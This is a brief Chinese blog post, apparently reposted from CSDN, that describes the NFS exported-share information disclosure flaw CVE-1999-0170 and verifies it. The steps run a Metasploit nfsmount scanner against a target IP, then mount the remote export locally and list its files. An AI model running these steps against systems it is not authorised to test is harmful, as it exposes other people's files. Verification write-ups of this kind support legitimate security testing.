文章目录

• • 描述
  • 验证

描述

漏洞名称：NFS Exported Share Information Disclosure
中文名称：NFS 共享信息泄露漏洞
漏洞等级：高危
CVE：CVE-1999-0170
Nessus扫描结果：
输出共享目录和文件信息：

验证

步骤1：msf 验证漏洞是否存在，并输出共享目录

use auxiliary/scanner/nfs/nfsmount
set rhosts 192.168.1.1（IP为目标IP，端口默认设置为111不改动） 

步骤2：

mkdir /tmp/test                                           //新建目录
mount -t nfs 192..168.1.1:/web/uploads /tmp/test          //将目标IP的目录挂载到本地新建的目录下 
df -k                                                     //查看挂载情况
ls /tmp/test                                              //查看已经共享过来的文件 

这时候已经得到目标机共享目录下的所有文件。

本文转自 https://blog.csdn.net/weixin_43486390/article/details/103988021，如有侵权，请联系删除。